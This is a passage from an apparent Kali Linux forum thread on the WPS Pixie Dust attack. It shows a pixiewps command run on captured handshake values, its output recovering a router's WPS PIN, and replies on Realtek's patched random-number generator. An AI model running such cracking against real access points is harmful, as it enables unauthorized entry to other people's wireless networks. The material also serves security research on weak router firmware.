    root@kali:~#  pixiewps -e  d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b  -s 0cc632d209fcc30061b54e6cadb95ebc20f3684a7143717f6672a0fd56d15d0b -z  ec58b705429daa80cf98dff8b670a5afe955c13969a1d432839ed1a41cf0dfd1 -a  2590feaa9629bc51c17de8c114a2d8f96b316f286684c6b47bee6ed55565cfd7 -n  3d0c07f9182a7ee771fe90637b31b32a -r  bf5cb51a82d1f86e10b67bb1983b869828e5ed0b6c9432550c35291eeeea0d73cc8ff47c157bb25a42ba4f393c663895cc7eebae487a914556ef0f181054013fbbc3b18db6d903482bc257adb1f27d417e71d3a37e936db68ee8597c9854b3c855f0032b96f11c92fa7517959f54431adab115312a3f4f2b012b12cec80ff6c653ba27179483fc2906e05c9f54c90a8eadf92839102017a5b444be7f54f22db094f9e08f7354cffeb6e8a8b5eb68933520c5968265a2135ced88c5f79f4b422d  -f
    
     Pixiewps 1.4
    
     [?] Mode:     3 (RTL819x)
     [*] Seed N1:  1434604969 (Thu Jun 18 05:22:49 2015 UTC)
     [*] Seed ES1: 1434604970 (Thu Jun 18 05:22:50 2015 UTC)
     [*] Seed ES2: 1434604970 (Thu Jun 18 05:22:50 2015 UTC)
     [*] PSK1:     8324b8e9659ec8250343001f54e42d15
     [*] PSK2:     755a3d251b04c08424b30608563cdfbc
     [*] ES1:      2a2d66064c4b473057da0e5123463097
     [*] ES2:      2a2d66064c4b473057da0e5123463097
     [+] WPS pin:  41299807
    
     [*] Time taken: 3 s 265 ms

    It did work with the second AP

  16. #16
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Realtek has actually had this patched since ~2016. If you want to look for yourself, hop onto Belkin's website and download the latest firmware and the previous firmware for F9K1105v2, extract them, and do a quick grep for "generate_random". They use /dev/urandom as well as some seemingly custom (and sh!tty) RNG on the side.

  17. #17
    Join Date
    2016-Dec
    Location
    Canada
    Posts
    326
    Quote Originally Posted by soxrok2212 View Post
    Realtek has actually had this patched since ~2016. If you want to look for yourself, hop onto Belkin's website and download the latest firmware and the previous firmware for F9K1105v2, extract them, and do a quick grep for "generate_random". They use /dev/urandom as well as some seemingly custom (and sh!tty) RNG on the side.
    Know why reaver is doing a hex dump hash on some crackes? Some crackes its not? Weird!
    easy to start; hard to finish

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum Project Archive
    Replies: 582
    Last Post: 2018-01-07, 11:58
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum Project Archive
    Replies: 243
    Last Post: 2017-11-09, 19:31
  3. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  4. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •